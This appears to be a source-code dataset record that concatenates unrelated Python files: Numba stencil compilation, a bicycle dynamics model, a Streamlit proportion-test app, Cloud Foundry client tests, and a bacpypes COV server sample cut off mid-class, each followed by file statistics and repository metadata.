self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)]) self._type_cache[argtys_extra] = (sig, result, typemap, calltypes) return sig def copy_ir_with_calltypes(self, ir, calltypes): """ Create a copy of a given IR along with its calltype information. We need a copy of the calltypes because copy propagation applied to the copied IR will change the calltypes and make subsequent uses of the original IR invalid. """ copy_calltypes = {} kernel_copy = ir.copy() kernel_copy.blocks = {} # For each block... for (block_label, block) in ir.blocks.items(): new_block = copy.deepcopy(ir.blocks[block_label]) new_block.body = [] # For each statement in each block... for stmt in ir.blocks[block_label].body: # Copy the statement to the new copy of the kernel # and if the original statement is in the original # calltypes then add the type associated with this # statement to the calltypes copy. scopy = copy.deepcopy(stmt) new_block.body.append(scopy) if stmt in calltypes: copy_calltypes[scopy] = calltypes[stmt] kernel_copy.blocks[block_label] = new_block return (kernel_copy, copy_calltypes) def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args): # Overall approach: # 1) Construct a string containing a function definition for the stencil function # that will execute the stencil kernel. This function definition includes a # unique stencil function name, the parameters to the stencil kernel, loop # nests across the dimensions of the input array. Those loop nests use the # computed stencil kernel size so as not to try to compute elements where # elements outside the bounds of the input array would be needed. # 2) The but of the loop nest in this new function is a special sentinel # assignment. # 3) Get the IR of this new function. # 4) Split the block containing the sentinel assignment and remove the sentinel # assignment. Insert the stencil kernel IR into the stencil function IR # after label and variable renaming of the stencil kernel IR to prevent # conflicts with the stencil function IR. # 5) Compile the combined stencil function IR + stencil kernel IR into existence. # Copy the kernel so that our changes for this callsite # won't effect other callsites. (kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes( self.kernel_ir, calltypes) # The stencil kernel body becomes the body of a loop, for which args aren't needed. ir_utils.remove_args(kernel_copy.blocks) first_arg = kernel_copy.arg_names[0] in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap) name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks) ir_utils.apply_copy_propagate( kernel_copy.blocks, in_cps, name_var_table, typemap, copy_calltypes) if "out" in name_var_table: raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.") sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table) if config.DEBUG_ARRAY_OPT >= 1: print("name_var_table", name_var_table, sentinel_name) the_array = args[0] if config.DEBUG_ARRAY_OPT >= 1: print("_stencil_wrapper", return_type, return_type.dtype, type(return_type.dtype), args) ir_utils.dump_blocks(kernel_copy.blocks) # We generate a Numba function to execute this stencil and here # create the unique name of this function. stencil_func_name = "__numba_stencil_%s_%s" % ( hex(id(the_array)).replace("-", "_"), self.id) # We will put a loop nest in the generated function for each # dimension in the input array. Here we create the name for # the index variable for each dimension. index0, index1, ... index_vars = [] for i in range(the_array.ndim): index_var_name = ir_utils.get_unused_var_name("index" + str(i), name_var_table) index_vars += [index_var_name] # Create extra signature for out and neighborhood. out_name = ir_utils.get_unused_var_name("out", name_var_table) neighborhood_name = ir_utils.get_unused_var_name("neighborhood", name_var_table) sig_extra = "" if result is not None: sig_extra += ", {}=None".format(out_name) if "neighborhood" in dict(self.kws): sig_extra += ", {}=None".format(neighborhood_name) # Get a list of the standard indexed array names. standard_indexed = self.options.get("standard_indexing", []) if first_arg in standard_indexed: raise NumbaValueError("The first argument to a stencil kernel must " "use relative indexing, not standard indexing.") if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0: raise NumbaValueError("Standard indexing requested for an array name " "not present in the stencil kernel definition.") # Add index variables to getitems in the IR to transition the accesses # in the kernel from relative to regular Python indexing. Returns the # computed size of the stencil kernel and a list of the relatively indexed # arrays. kernel_size, relatively_indexed = self.add_indices_to_kernel( kernel_copy, index_vars, the_array.ndim, self.neighborhood, standard_indexed, typemap, copy_calltypes) if self.neighborhood is None: self.neighborhood = kernel_size if config.DEBUG_ARRAY_OPT >= 1: print("After add_indices_to_kernel") ir_utils.dump_blocks(kernel_copy.blocks) # The return in the stencil kernel becomes a setitem for that # particular point in the iteration space. ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks, index_vars, out_name) if config.DEBUG_ARRAY_OPT >= 1: print("After replace_return_with_setitem", ret_blocks) ir_utils.dump_blocks(kernel_copy.blocks) # Start to form the new function to execute the stencil kernel. func_text = "def {}({}{}):\n".format(stencil_func_name, ",".join(kernel_copy.arg_names), sig_extra) # Get loop ranges for each dimension, which could be either int # or variable. In the latter case we'll use the extra neighborhood # argument to the function. ranges = [] for i in range(the_array.ndim): if isinstance(kernel_size[i][0], int): lo = kernel_size[i][0] hi = kernel_size[i][1] else: lo = "{}[{}][0]".format(neighborhood_name, i) hi = "{}[{}][1]".format(neighborhood_name, i) ranges.append((lo, hi)) # If there are more than one relatively indexed arrays, add a call to # a function that will raise an error if any of the relatively indexed # arrays are of different size than the first input array. if len(relatively_indexed) > 1: func_text += " raise_if_incompatible_array_sizes(" + first_arg for other_array in relatively_indexed: if other_array != first_arg: func_text += "," + other_array func_text += ")\n" # Get the shape of the first input array. shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table) func_text += " {} = {}.shape\n".format(shape_name, first_arg) # Converts cval to a string constant def cval_as_str(cval): if not np.isfinite(cval): # See if this is a string-repr numerical const, issue #7286 if np.isnan(cval): return "np.nan" elif np.isinf(cval): if cval < 0: return "-np.inf" else: return "np.inf" else: return str(cval) # If we have to allocate the output array (the out argument was not used) # then us numpy.full if the user specified a cval stencil decorator option # or np.zeros if they didn't to allocate the array. if result is None: return_type_name = numpy_support.as_dtype( return_type.dtype).type.__name__ if "cval" in self.options: cval = self.options["cval"] if return_type.dtype != typing.typeof.typeof(cval): msg = "cval type does not match stencil return type." raise NumbaValueError(msg) out_init ="{} = np.full({}, {}, dtype=np.{})\n".format( out_name, shape_name, cval_as_str(cval), return_type_name) else: out_init ="{} = np.zeros({}, dtype=np.{})\n".format( out_name, shape_name, return_type_name) func_text += " " + out_init else: # result is present, if cval is set then use it if "cval" in self.options: cval = self.options["cval"] cval_ty = typing.typeof.typeof(cval) if not self._typingctx.can_convert(cval_ty, return_type.dtype): msg = "cval type does not match stencil return type." raise NumbaValueError(msg) out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval)) func_text += " " + out_init offset = 1 # Add the loop nests to the new function. for i in range(the_array.ndim): for j in range(offset): func_text += " " # ranges[i][0] is the minimum index used in the i'th dimension # but minimum's greater than 0 don't preclude any entry in the array. # So, take the minimum of 0 and the minimum index found in the kernel # and this will be a negative number (potentially -0). Then, we do # unary - on that to get the positive offset in this dimension whose # use is precluded. # ranges[i][1] is the maximum of 0 and the observed maximum index # in this dimension because negative maximums would not cause us to # preclude any entry in the array from being used. func_text += ("for {} in range(-min(0,{})," "{}[{}]-max(0,{})):\n").format( index_vars[i], ranges[i][0], shape_name, i, ranges[i][1]) offset += 1 for j in range(offset): func_text += " " # Put a sentinel in the code so we can locate it in the IR. We will # remove this sentinel assignment and replace it with the IR for the # stencil kernel body. func_text += "{} = 0\n".format(sentinel_name) func_text += " return {}\n".format(out_name) if config.DEBUG_ARRAY_OPT >= 1: print("new stencil func text") print(func_text) # Force the new stencil function into existence. exec(func_text) in globals(), locals() stencil_func = eval(stencil_func_name) if sigret is not None: pysig = utils.pysignature(stencil_func) sigret.pysig = pysig # Get the IR for the newly created stencil function. from numba.core import compiler stencil_ir = compiler.run_frontend(stencil_func) ir_utils.remove_dels(stencil_ir.blocks) # rename all variables in stencil_ir afresh var_table = ir_utils.get_name_var_table(stencil_ir.blocks) new_var_dict = {} reserved_names = ([sentinel_name, out_name, neighborhood_name, shape_name] + kernel_copy.arg_names + index_vars) for name, var in var_table.items(): if not name in reserved_names: new_var_dict[name] = ir_utils.mk_unique_var(name) ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict) stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1 # Shift labels in the kernel copy so they are guaranteed unique # and don't conflict with any labels in the stencil_ir. kernel_copy.blocks = ir_utils.add_offset_to_labels( kernel_copy.blocks, stencil_stub_last_label) new_label = max(kernel_copy.blocks.keys()) + 1 # Adjust ret_blocks to account for addition of the offset. ret_blocks = [x + stencil_stub_last_label for x in ret_blocks] if config.DEBUG_ARRAY_OPT >= 1: print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label) print("before replace sentinel stencil_ir") ir_utils.dump_blocks(stencil_ir.blocks) print("before replace sentinel kernel_copy") ir_utils.dump_blocks(kernel_copy.blocks) # Search all the block in the stencil outline for the sentinel. for label, block in stencil_ir.blocks.items(): for i, inst in enumerate(block.body): if (isinstance( inst, ir.Assign) and inst.target.name == sentinel_name): # We found the sentinel assignment. loc = inst.loc scope = block.scope # split block across __sentinel__ # A new block is allocated for the statements prior to the # sentinel but the new block maintains the current block # label. prev_block = ir.Block(scope, loc) prev_block.body = block.body[:i] # The current block is used for statements after sentinel. block.body = block.body[i + 1:] # But the current block gets a new label. body_first_label = min(kernel_copy.blocks.keys()) # The previous block jumps to the minimum labelled block of # the parfor body. prev_block.append(ir.Jump(body_first_label, loc)) # Add all the parfor loop body blocks to the gufunc # function's IR. for (l, b) in kernel_copy.blocks.items(): stencil_ir.blocks[l] = b stencil_ir.blocks[new_label] = block stencil_ir.blocks[label] = prev_block # Add a jump from all the blocks that previously contained # a return in the stencil kernel to the block # containing statements after the sentinel. for ret_block in ret_blocks: stencil_ir.blocks[ret_block].append( ir.Jump(new_label, loc)) break else: continue break stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks) ir_utils.remove_dels(stencil_ir.blocks) assert(isinstance(the_array, types.Type)) array_types = args new_stencil_param_types = list(array_types) if config.DEBUG_ARRAY_OPT >= 1: print("new_stencil_param_types", new_stencil_param_types) ir_utils.dump_blocks(stencil_ir.blocks) # Compile the combined stencil function with the replaced loop # body in it. ir_utils.fixup_var_define_in_scope(stencil_ir.blocks) new_func = compiler.compile_ir( self._typingctx, self._targetctx, stencil_ir, new_stencil_param_types, None, compiler.DEFAULT_FLAGS, {}) return new_func def __call__(self, *args, **kwargs): if (self.neighborhood is not None and len(self.neighborhood) != args[0].ndim): raise ValueError("{} dimensional neighborhood specified for {} " "dimensional input array".format( len(self.neighborhood), args[0].ndim)) if 'out' in kwargs: result = kwargs['out'] rdtype = result.dtype rttype = numpy_support.from_dtype(rdtype) result_type = types.npytypes.Array(rttype, result.ndim, numpy_support.map_layout(result)) array_types = tuple([typing.typeof.typeof(x) for x in args]) array_types_full = tuple([typing.typeof.typeof(x) for x in args] + [result_type]) else: result = None array_types = tuple([typing.typeof.typeof(x) for x in args]) array_types_full = array_types if config.DEBUG_ARRAY_OPT >= 1: print("__call__", array_types, args, kwargs) (real_ret, typemap, calltypes) = self.get_return_type(array_types) new_func = self._stencil_wrapper(result, None, real_ret, typemap, calltypes, *array_types_full) if result is None: return new_func.entry_point(*args) else: return new_func.entry_point(*(args+(result,))) def stencil(func_or_mode='constant', **options): # called on function without specifying mode style if not isinstance(func_or_mode, str): mode = 'constant' # default style func = func_or_mode else: mode = func_or_mode func = None for option in options: if option not in ["cval", "standard_indexing", "neighborhood"]: raise ValueError("Unknown stencil option " + option) wrapper = _stencil(mode, options) if func is not None: return wrapper(func) return wrapper def _stencil(mode, options): if mode != 'constant': raise ValueError("Unsupported mode style " + mode) def decorated(func): from numba.core import compiler kernel_ir = compiler.run_frontend(func) return StencilFunc(kernel_ir, mode, options) return decorated @lower_builtin(stencil) def stencil_dummy_lower(context, builder, sig, args): "lowering for dummy stencil calls" return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
47.849579
141
0.554133
36,754
0.924327
0
0
1,309
0.03292
0
0
10,636
0.267485
4c30fc13cf631ce207921b9c3acc713c3fb36b5f
3,754
py
Python
examples/bicycle/bicycle_dynamics.py
lujieyang/irs_lqr
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
[ "MIT" ]
6
2021-11-20T19:05:06.000Z
2022-01-31T00:10:41.000Z
examples/bicycle/bicycle_dynamics.py
lujieyang/irs_lqr
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
[ "MIT" ]
10
2021-07-24T19:50:36.000Z
2021-11-20T19:06:40.000Z
examples/bicycle/bicycle_dynamics.py
lujieyang/irs_lqr
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
[ "MIT" ]
1
2021-12-15T22:09:31.000Z
2021-12-15T22:09:31.000Z
import numpy as np import pydrake.symbolic as ps import torch import time from irs_lqr.dynamical_system import DynamicalSystem class BicycleDynamics(DynamicalSystem): def __init__(self, h): super().__init__() """ x = [x pos, y pos, heading, speed, steering_angle] u = [acceleration, steering_velocity] """ self.h = h self.dim_x = 5 self.dim_u = 2 """Jacobian computations""" self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)]) self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)]) self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym) self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym))) def dynamics_sym(self, x, u): """ Symbolic expression for dynamics. Used to compute linearizations of the system. x (np.array, dim: n): state u (np.array, dim: m): action """ heading = x[2] v = x[3] steer = x[4] dxdt = np.array([ v * ps.cos(heading), v * ps.sin(heading), v * ps.tan(steer), u[0], u[1] ]) x_new = x + self.h * dxdt return x_new def dynamics(self, x, u): """ Numeric expression for dynamics. x (np.array, dim: n): state u (np.array, dim: m): action """ heading = x[2] v = x[3] steer = x[4] dxdt = np.array([ v * np.cos(heading), v * np.sin(heading), v * np.tan(steer), u[0], u[1] ]) x_new = x + self.h * dxdt return x_new def dynamics_batch(self, x, u): """ Batch dynamics. Uses pytorch for -args: x (np.array, dim: B x n): batched state u (np.array, dim: B x m): batched input -returns: xnext (np.array, dim: B x n): batched next state """ heading = x[:,2] v = x[:,3] steer = x[:,4] dxdt = np.vstack(( v * np.cos(heading), v * np.sin(heading), v * np.tan(steer), u[:,0], u[:,1] )).transpose() x_new = x + self.h * dxdt return x_new def dynamics_batch_torch(self, x, u): """ Batch dynamics. Uses pytorch for -args: x (np.array, dim: B x n): batched state u (np.array, dim: B x m): batched input -returns: xnext (np.array, dim: B x n): batched next state """ x = torch.Tensor(x).cuda() u = torch.Tensor(u).cuda() heading = x[:,2] v = x[:,3] steer = x[:,4] dxdt = torch.vstack(( v * torch.cos(heading), v * torch.sin(heading), v * torch.tan(steer), u[:,0], u[:,1] )).T x_new = x + self.h * dxdt return x_new def jacobian_xu(self, x, u): """ Recoever linearized dynamics dfdx as a function of x, u """ env = {self.x_sym[i]: x[i] for i in range(self.dim_x)} env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)}) f_x = ps.Evaluate(self.jacobian_xu_sym, env) return f_x def jacobian_xu_batch(self, x, u): """ Recoever linearized dynamics dfd(xu) as a function of x, u """ dxdu_batch = np.zeros(( x.shape[0], x.shape[1], x.shape[1] + u.shape[1])) for i in range(x.shape[0]): dxdu_batch[i] = self.jacobian_xu(x[i], u[i]) return dxdu_batch
28.225564
91
0.483751
3,616
0.963239
0
0
0
0
0
0
1,151
0.306606
4c30fdedde14a46b90015527caf9d689634cdfab
6,504
py
Python
apps/proportions.py
harmkenn/PST_Deploy_Test
2484acf13f1f998c98fa94fad98c1f75c27d292b
[ "MIT" ]
null
null
null
apps/proportions.py
harmkenn/PST_Deploy_Test
2484acf13f1f998c98fa94fad98c1f75c27d292b
[ "MIT" ]
null
null
null
apps/proportions.py
harmkenn/PST_Deploy_Test
2484acf13f1f998c98fa94fad98c1f75c27d292b
[ "MIT" ]
null
null
null
import streamlit as st import math from scipy.stats import * import pandas as pd import numpy as np from plotnine import * def app(): # title of the app st.subheader("Proportions") st.sidebar.subheader("Proportion Settings") prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"]) if prop_choice == "One Proportion": c1,c2,c3 = st.columns(3) with c1: x = int(st.text_input("Hits",20)) n = int(st.text_input("Tries",25)) with c2: nullp = float(st.text_input("Null:",.7)) alpha = float(st.text_input("Alpha",.05)) with c3: st.markdown("Pick a test:") tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"]) one = st.columns(1) with one[0]: p_hat = x/n tsd = math.sqrt(nullp*(1-nullp)/n) cise = math.sqrt(p_hat*(1-p_hat)/n) z = (p_hat - nullp)/tsd x = np.arange(-4,4,.1) y = norm.pdf(x) ndf = pd.DataFrame({"x":x,"y":y}) normp = ggplot(ndf) + coord_fixed(ratio = 4) if tail_choice == "Left Tail": pv = norm.cdf(z) cz = norm.ppf(alpha) rcz = cz cl = 1 - 2*alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz)) if tail_choice == "Two Tails": pv = 2*(1-norm.cdf(abs(z))) cz = abs(norm.ppf(alpha/2)) rcz = "±" + str(abs(norm.ppf(alpha/2))) cl = 1 - alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z))) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz))) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4)) if tail_choice == "Right Tail": pv = 1 - norm.cdf(z) cz = -1 * norm.ppf(alpha) rcz = cz cl = 1 - 2*alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4)) me = cz * cise rme = "±" + str(abs(me)) data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0]) st.write(data) normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red") normp = normp + geom_line(aes(x=x,y=y)) st.pyplot(ggplot.draw(normp)) lower = p_hat - abs(me) upper = p_hat + abs(me) st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")") if prop_choice == "Two Proportions": c1,c2,c3 = st.columns(3) with c1: x1 = int(st.text_input("Hits 1",20)) n1 = int(st.text_input("Tries 1",25)) with c2: x2 = int(st.text_input("Hits 2",30)) n2 = int(st.text_input("Tries 2",50)) with c3: alpha = float(st.text_input("Alpha",.05)) st.markdown("Pick a test:") tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"]) one = st.columns(1) with one[0]: p_hat1 = x1/n1 q_hat1 = 1 -p_hat1 p_hat2 = x2/n2 q_hat2 = 1 - p_hat2 pp_hat = (x1+x2)/(n1+n2) dp_hat = p_hat1 - p_hat2 pq_hat = 1-pp_hat tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2)) cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2) z = (p_hat1 - p_hat2)/tsd x = np.arange(-4,4,.1) y = norm.pdf(x) ndf = pd.DataFrame({"x":x,"y":y}) normp = ggplot(ndf) + coord_fixed(ratio = 4) if tail_choice == "Left Tail": pv = norm.cdf(z) cz = norm.ppf(alpha) rcz = cz cl = 1 - 2*alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz)) if tail_choice == "Two Tails": pv = 2*(1-norm.cdf(abs(z))) cz = abs(norm.ppf(alpha/2)) rcz = "±" + str(abs(norm.ppf(alpha/2))) cl = 1 - alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z))) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz))) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4)) if tail_choice == "Right Tail": pv = 1 - norm.cdf(z) cz = -1 * norm.ppf(alpha) rcz = cz cl = 1 - 2*alpha normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4)) normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4)) me = cz * cise rme = "±" + str(abs(me)) data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0]) st.write(data) normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red") normp = normp + geom_line(aes(x=x,y=y)) st.pyplot(ggplot.draw(normp)) lower = dp_hat - abs(me) upper = dp_hat + abs(me) st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
48.177778
207
0.482934
0
0
0
0
0
0
0
0
869
0.133528
4c31c440814ac777bd4779fa4968cf1b1847bcac
1,263
py
Python
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
47
2017-12-17T00:54:33.000Z
2022-02-25T09:54:52.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
125
2017-10-27T09:38:10.000Z
2022-03-10T07:53:35.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
50
2018-01-19T07:57:21.000Z
2022-02-14T14:47:31.000Z
import logging import unittest from config_test import build_client_from_configuration _logger = logging.getLogger(__name__) class TestServiceInstances(unittest.TestCase): def test_create_update_delete(self): client = build_client_from_configuration() result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters) if len(client.update_parameters) > 0: client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters) else: _logger.warning("update test skipped") client.v2.service_instances.remove(result["metadata"]["guid"]) def test_get(self): client = build_client_from_configuration() cpt = 0 for instance in client.v2.service_instances.list(): if cpt == 0: self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"])) self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"])) self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"])) cpt += 1 _logger.debug("test_get - %d found", cpt)
43.551724
129
0.69517
1,133
0.89707
0
0
0
0
0
0
137
0.108472
4c31cf7c510d884081297346de14530206f0c46f
24
py
Python
runway/core/providers/__init__.py
troyready/runway
4fd299961a4b73df39e14f4f19a7236f7be17dd8
[ "Apache-2.0" ]
134
2018-02-26T21:35:23.000Z
2022-03-03T00:30:27.000Z
runway/core/providers/__init__.py
asksmruti/runway
8aca76df9372e3d13eb35e12f81758f618e89e74
[ "Apache-2.0" ]
937
2018-03-08T22:04:35.000Z
2022-03-30T12:21:47.000Z
runway/core/providers/__init__.py
asksmruti/runway
8aca76df9372e3d13eb35e12f81758f618e89e74
[ "Apache-2.0" ]
70
2018-02-26T23:48:11.000Z
2022-03-02T18:44:30.000Z
"""Runway providers."""
12
23
0.625
0
0
0
0
0
0
0
0
23
0.958333
4c32dcda5e8a9e2b82a81dd52550421a3c5cdcea
13,265
py
Python
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
#!/usr/bin/env python """ This sample application is a server that supports COV notification services. The console accepts commands that change the properties of an object that triggers the notifications. """ import time from threading import Thread from bacpypes.debugging import bacpypes_debugging, ModuleLogger from bacpypes.consolelogging import ConfigArgumentParser from bacpypes.consolecmd import ConsoleCmd from bacpypes.core import run, deferred, enable_sleeping from bacpypes.task import RecurringTask from bacpypes.app import BIPSimpleApplication from bacpypes.object import AnalogValueObject, BinaryValueObject from bacpypes.local.device import LocalDeviceObject from bacpypes.service.cov import ChangeOfValueServices # some debugging _debug = 0 _log = ModuleLogger(globals()) # test globals test_av = None test_bv = None test_application = None # # SubscribeCOVApplication # @bacpypes_debugging class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices): pass # # COVConsoleCmd # @bacpypes_debugging class COVConsoleCmd(ConsoleCmd): def do_status(self, args): """status""" args = args.split() if _debug: COVConsoleCmd._debug("do_status %r", args) global test_application # dump from the COV detections dict for obj_ref, cov_detection in test_application.cov_detections.items(): print("{} {}".format(obj_ref.objectIdentifier, obj_ref)) for cov_subscription in cov_detection.cov_subscriptions: print(" {} proc_id={} confirmed={} lifetime={}".format( cov_subscription.client_addr, cov_subscription.proc_id, cov_subscription.confirmed, cov_subscription.lifetime, )) def do_trigger(self, args): """trigger object_name""" args = args.split() if _debug: COVConsoleCmd._debug("do_trigger %r", args) global test_application if not args: print("object name required") return obj = test_application.get_object_name(args[0]) if not obj: print("no such object") return # get the detection algorithm object cov_detection = test_application.cov_detections.get(obj, None) if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0): print("no subscriptions for that object") return # tell it to send out notifications cov_detection.send_cov_notifications() def do_set(self, args): """set object_name [ . ] property_name [ = ] value""" args = args.split() if _debug: COVConsoleCmd._debug("do_set %r", args) global test_application try: object_name = args.pop(0) if '.' in object_name: object_name, property_name = object_name.split('.') else: property_name = args.pop(0) if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name) if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name) obj = test_application.get_object_name(object_name) if _debug: COVConsoleCmd._debug(" - obj: %r", obj) if not obj: raise RuntimeError("object not found: %r" % (object_name,)) datatype = obj.get_datatype(property_name) if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype) if not datatype: raise RuntimeError("not a property: %r" % (property_name,)) # toss the equals if args[0] == '=': args.pop(0) # evaluate the value value = eval(args.pop(0)) if _debug: COVConsoleCmd._debug(" - raw value: %r", value) # see if it can be built obj_value = datatype(value) if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value) # normalize value = obj_value.value if _debug: COVConsoleCmd._debug(" - normalized value: %r", value) # change the value setattr(obj, property_name, value) except IndexError: print(COVConsoleCmd.do_set.__doc__) except Exception as err: print("exception: %s" % (err,)) def do_write(self, args): """write object_name [ . ] property [ = ] value""" args = args.split() if _debug: COVConsoleCmd._debug("do_set %r", args) global test_application try: object_name = args.pop(0) if '.' in object_name: object_name, property_name = object_name.split('.') else: property_name = args.pop(0) if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name) if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name) obj = test_application.get_object_name(object_name) if _debug: COVConsoleCmd._debug(" - obj: %r", obj) if not obj: raise RuntimeError("object not found: %r" % (object_name,)) datatype = obj.get_datatype(property_name) if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype) if not datatype: raise RuntimeError("not a property: %r" % (property_name,)) # toss the equals if args[0] == '=': args.pop(0) # evaluate the value value = eval(args.pop(0)) if _debug: COVConsoleCmd._debug(" - raw value: %r", value) # see if it can be built obj_value = datatype(value) if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value) # normalize value = obj_value.value if _debug: COVConsoleCmd._debug(" - normalized value: %r", value) # pass it along obj.WriteProperty(property_name, value) except IndexError: print(COVConsoleCmd.do_write.__doc__) except Exception as err: print("exception: %s" % (err,)) @bacpypes_debugging class TestAnalogValueTask(RecurringTask): """ An instance of this class is created when '--avtask <interval>' is specified as a command line argument. Every <interval> seconds it changes the value of the test_av present value. """ def __init__(self, interval): if _debug: TestAnalogValueTask._debug("__init__ %r", interval) RecurringTask.__init__(self, interval * 1000) # make a list of test values self.test_values = list(float(i * 10) for i in range(10)) def process_task(self): if _debug: TestAnalogValueTask._debug("process_task") global test_av # pop the next value next_value = self.test_values.pop(0) self.test_values.append(next_value) if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value) # change the point test_av.presentValue = next_value @bacpypes_debugging class TestAnalogValueThread(Thread): """ An instance of this class is created when '--avthread <interval>' is specified as a command line argument. Every <interval> seconds it changes the value of the test_av present value. """ def __init__(self, interval): if _debug: TestAnalogValueThread._debug("__init__ %r", interval) Thread.__init__(self) # runs as a daemon self.daemon = True # save the interval self.interval = interval # make a list of test values self.test_values = list(100.0 + float(i * 10) for i in range(10)) def run(self): if _debug: TestAnalogValueThread._debug("run") global test_av while True: # pop the next value next_value = self.test_values.pop(0) self.test_values.append(next_value) if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value) # change the point test_av.presentValue = next_value # sleep time.sleep(self.interval) @bacpypes_debugging class TestBinaryValueTask(RecurringTask): """ An instance of this class is created when '--bvtask <interval>' is specified as a command line argument. Every <interval> seconds it changes the value of the test_bv present value. """ def __init__(self, interval): if _debug: TestBinaryValueTask._debug("__init__ %r", interval) RecurringTask.__init__(self, interval * 1000) # save the interval self.interval = interval # make a list of test values self.test_values = [True, False] def process_task(self): if _debug: TestBinaryValueTask._debug("process_task") global test_bv # pop the next value next_value = self.test_values.pop(0) self.test_values.append(next_value) if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value) # change the point test_bv.presentValue = next_value @bacpypes_debugging class TestBinaryValueThread(RecurringTask, Thread): """ An instance of this class is created when '--bvthread <interval>' is specified as a command line argument. Every <interval> seconds it changes the value of the test_bv present value. """ def __init__(self, interval): if _debug: 